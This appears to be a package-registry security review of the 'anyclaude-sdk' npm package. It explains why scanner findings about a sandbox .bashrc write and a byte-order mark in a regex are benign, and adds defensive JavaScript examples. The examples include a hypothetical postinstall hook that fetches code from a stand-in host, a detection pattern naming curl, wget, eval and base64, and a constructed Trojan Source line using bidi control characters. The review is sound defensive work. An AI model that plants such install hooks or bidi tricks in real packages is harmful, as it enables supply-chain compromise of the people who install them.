
anyclaude-sdk@0.14.5

Standalone, browser-compatible SDK providing Claude Code agent capabilities (tools, tool loop, multi-turn, MCP, sub-agents, sessions) against any OpenAI/Anthropic-compatible LLM endpoint. Runs in the browser (WebContainer), Node, and Bun — no backend requ

AI Security Review

scanned 2d ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. Risky primitives are package-aligned SDK capabilities for agent workspaces and user-configured LLM/MCP/network tools, not hidden install-time or import-time behavior.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
User imports SDK and explicitly calls query(), sandbox, tool, MCP, telemetry, or update APIs.
Impact
No evidence of credential harvesting, unauthorized persistence, destructive behavior, or covert exfiltration.
Mechanism
User-invoked agent SDK capabilities with optional telemetry/update checks.
Rationale
Static inspection found normal SDK functionality: LLM clients, agent tools, optional sandbox shell/filesystem operations, MCP clients, telemetry, and update checks with visible controls. Scanner findings map to benign BOM parsing and sandbox skeleton writes rather than concrete attack behavior.
Evidence
package.json
dist/index.js
dist/skills/parse.js
dist/fs/linuxTree.js
dist/query.js
dist/telemetry.js
dist/update.js
dist/sandbox/local.js
dist/mcp/stdio.js
dist/tools/bash.js
dist/tools/web_fetch.js
dist/tools/web_search.js
Network endpoints (6)
anyclaude-telemetry.puter.work
registry.npmjs.org
api.anthropic.com/v1
api.openai.com/v1
r.jina.ai/
html.duckduckgo.com/html/?q=

Decision evidence

public snapshot
AI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
    Evidence against
    • package.json has no install/postinstall hook; prepublishOnly only builds before publishing.
    • dist/index.js is a barrel export; no import-time execution beyond module exports.
    • dist/skills/parse.js BOM-tolerant regex is not Trojan Source control-flow deception.
    • dist/fs/linuxTree.js only seeds caller-provided sandbox FS with FHS placeholder files.
    • Shell, filesystem writes, MCP stdio, and web tools are SDK features invoked through query/tool APIs, not hidden lifecycle behavior.
    • Telemetry/update checks are source-disclosed, opt-out, coarse, and do not harvest prompts, files, env, or credentials.
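The first bullet above rests on a check any reviewer can repeat: which `scripts` entries npm runs in a consumer's environment at install time, as opposed to on the maintainer's machine at publish time. The audit below is an added example, not code from anyclaude-sdk or from the lpm-firewall-ai scanner. Both manifests are constructed for the example: the first mirrors what the review describes (a `prepublishOnly` that only builds), the second is a hypothetical package with a `postinstall` hook that fetches remote code.

```javascript
// Added example, not code from anyclaude-sdk or from the scanner: audit a
// package.json for scripts that npm runs automatically when the package is
// installed as a dependency, which is where install-time supply-chain
// payloads live. The manifests at the bottom are constructed for the example.

// Lifecycle scripts npm executes during `npm install`. `prepare` also runs
// for git dependencies and for a bare `npm install` in a checkout, so it is
// treated as install-time here.
const INSTALL_TIME_HOOKS = new Set(['preinstall', 'install', 'postinstall', 'prepare']);

// Lifecycle scripts that only run in the publishing maintainer's workflow.
const PUBLISH_TIME_HOOKS = new Set([
  'prepublish', 'prepublishOnly', 'prepack', 'postpack', 'publish', 'postpublish',
]);

// Command patterns that deserve a closer look inside an install-time hook:
// fetching remote content, evaluating inline code, decoding payloads.
const SUSPICIOUS_COMMAND =
  /\b(curl|wget|node\s+-e|eval|base64|powershell|Invoke-WebRequest)\b|https?:\/\//i;

function auditLifecycleScripts(manifest) {
  const scripts = manifest.scripts || {};
  const report = { installTime: [], publishTime: [], other: [], suspicious: [] };
  for (const [name, cmd] of Object.entries(scripts)) {
    const entry = { name, cmd };
    if (INSTALL_TIME_HOOKS.has(name)) {
      report.installTime.push(entry);
      if (SUSPICIOUS_COMMAND.test(cmd)) report.suspicious.push(entry);
    } else if (PUBLISH_TIME_HOOKS.has(name)) {
      report.publishTime.push(entry);
    } else {
      report.other.push(entry);
    }
  }
  // No install-time hooks means nothing runs on `npm install`; code that runs
  // on import is a separate question answered by reading the entrypoints.
  report.runsOnInstall = report.installTime.length > 0;
  return report;
}

// Constructed manifest shaped like the one the review describes.
const CLEAN_MANIFEST = {
  name: 'example-sdk',
  version: '0.0.0',
  scripts: { build: 'tsc -p .', test: 'node --test', prepublishOnly: 'npm run build' },
};

// Constructed, hypothetical manifest with a remote-fetching postinstall hook.
const HOOKED_MANIFEST = {
  name: 'example-hooked',
  version: '0.0.0',
  scripts: {
    postinstall: "node -e \"require('https').get('https://example.invalid/p')\"",
  },
};

console.log(auditLifecycleScripts(CLEAN_MANIFEST));
console.log(auditLifecycleScripts(HOOKED_MANIFEST));
```

Where a package does carry install-time hooks, `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) prevents them from running, at the cost of breaking packages that genuinely need a build step at install.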
    Behavioral surface
    Source: ChildProcess, Filesystem, Network, Shell
    Supply chain: HighEntropyStrings, UrlStrings
    Manifest: No manifest risk signals triggered.
    scanned 115 file(s), 428 KB of source, external domains: anyclaude-telemetry.puter.work, api.anthropic.com, api.openai.com, duckduckgo.com, github.com, html.duckduckgo.com, r.jina.ai, registry.npmjs.org, webcontainers.io

    Source & flagged code

    3 flagged
    dist/fs/linuxTree.js
    L27: VERSION_ID="1.0"
    L28: HOME_URL="https://webcontainers.io"
    L29: `;
    ...
    L41: await fs.writeFile('/etc/os-release', OS_RELEASE);
    L42: await fs.writeFile(`${home}/.bashrc`, '');
    L43: }
    Medium · Install Persistence

    Source writes installer persistence such as shell profile or service configuration.

    dist/fs/linuxTree.js, L27
    Per the evidence above, `fs` here is the caller-provided sandbox filesystem being seeded with FHS placeholder files, so the `${home}/.bashrc` write lands in the agent's workspace, not in the host user's shell profile.
    dist/skills/parse.js
    L3: contains invisible/control Unicode U+FEFF (zero width no-break space)
    L3: const FRONTMATTER = /^<U+FEFF>?---\r?\n([\s\S]*?)\r?\n---\r?\n?([\s\S]*)$/;
    Critical · Trojan Source Unicode

    Source contains bidi control or invisible Unicode characters associated with Trojan Source attacks.

    dist/skills/parse.js, L3
    The flagged character is a UTF-8 byte-order mark made optional at the start of the frontmatter pattern, so skill files saved with a BOM still parse. It is not a bidirectional control character, which is why the evidence above classes it as BOM tolerance rather than Trojan Source control-flow deception.
    Trigger-reachable chain: manifest.exports -> dist/skills/index.js -> dist/skills/parse.js
    Reachable file contains a blocking source-risk pattern.
    Critical · Trigger Reachable Dangerous Capability

    A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

    dist/skills/parse.js
    The blocking pattern this chain reaches is the U+FEFF match in the same file; the finding says only that parse.js loads when a consumer imports the skills export, so it stands or falls with the Trojan Source finding above.
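To see why the two Critical findings reduce to a BOM-tolerance question, the following added example (not code from anyclaude-sdk or from the scanner) reproduces the flagged regex with the U+FEFF written as an escape, parses constructed skill files with and without a BOM, and then runs two character scans over a constructed copy of the flagged line: a broad "invisible Unicode" class like the scanner's, and a narrow class limited to the bidirectional controls that Trojan Source (CVE-2021-42574) actually relies on. The `TROJAN_LINE` input is a hypothetical comment in the style of the published commenting-out attack, not taken from any project.

```javascript
// Added example, not code from anyclaude-sdk or from the scanner. All inputs
// below are constructed for the example.

// The regex as quoted in the finding, BOM written as an escape. U+FEFF at the
// start of a file is a UTF-8 byte-order mark; making it optional keeps skill
// files saved by BOM-emitting editors parseable.
const FRONTMATTER = /^\uFEFF?---\r?\n([\s\S]*?)\r?\n---\r?\n?([\s\S]*)$/;

function parseSkill(text) {
  const m = FRONTMATTER.exec(text);
  if (!m) return { frontmatter: null, body: text };
  return { frontmatter: m[1], body: m[2] };
}

// Broad class in the spirit of the scanner's rule: BOM, zero-width
// characters and bidi controls alike.
const INVISIBLE_UNICODE = /[\uFEFF\u200B-\u200D\u2060\u202A-\u202E\u2066-\u2069]/g;

// Narrow class: bidirectional embedding, override and isolate controls,
// which can make source render in a different order than it is parsed.
// A byte-order mark is not one of them.
const BIDI_CONTROLS = /[\u202A-\u202E\u2066-\u2069]/g;

function findCodePoints(text, re) {
  const hits = [];
  for (const m of text.matchAll(re)) {
    hits.push({
      index: m.index,
      codePoint: 'U+' + m[0].codePointAt(0).toString(16).toUpperCase().padStart(4, '0'),
    });
  }
  return hits;
}

// Constructed stand-in for line 3 of parse.js: a literal BOM inside the
// regex source text, which is what the scanner matched.
const PARSE_JS_LINE3 =
  'const FRONTMATTER = /^\uFEFF?---\\r?\\n([\\s\\S]*?)\\r?\\n---\\r?\\n?([\\s\\S]*)$/;';

// Constructed skill files: one saved with a BOM and LF, one without and CRLF.
const SKILL_WITH_BOM = '\uFEFF---\nname: demo\n---\nDo the thing.\n';
const SKILL_NO_BOM = '---\r\nname: demo\r\n---\r\nDo the thing.\r\n';

// Hypothetical Trojan Source style line: RLO (U+202E) plus isolates make a
// comment appear to close where it does not.
const TROJAN_LINE =
  '/*\u202E } \u2066 if (isAdmin) \u2069 \u2066 begin admins only */\n';

console.log(parseSkill(SKILL_WITH_BOM));
console.log('broad hits on parse.js line:', findCodePoints(PARSE_JS_LINE3, INVISIBLE_UNICODE));
console.log('bidi hits on parse.js line:', findCodePoints(PARSE_JS_LINE3, BIDI_CONTROLS));
console.log('bidi hits on trojan line:', findCodePoints(TROJAN_LINE, BIDI_CONTROLS));
```

The broad scan reproduces the scanner's hit (one U+FEFF), the narrow scan finds nothing in the regex line and four controls in the constructed Trojan Source line. A rule that wants to catch Trojan Source without flagging every BOM-tolerant parser should match the narrow class, or at least treat a lone U+FEFF as a lower-severity signal.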

    Findings

    2 Critical, 3 Medium, 5 Low

    Critical · Trojan Source Unicode · dist/skills/parse.js
    Critical · Trigger Reachable Dangerous Capability · dist/skills/parse.js
    Medium · Network
    Medium · Install Persistence · dist/fs/linuxTree.js
    Medium · Structural Risk Force Deep Review
    Low · Non Install Lifecycle Scripts
    Low · Scripts Present
    Low · Filesystem
    Low · High Entropy Strings
    Low · Url Strings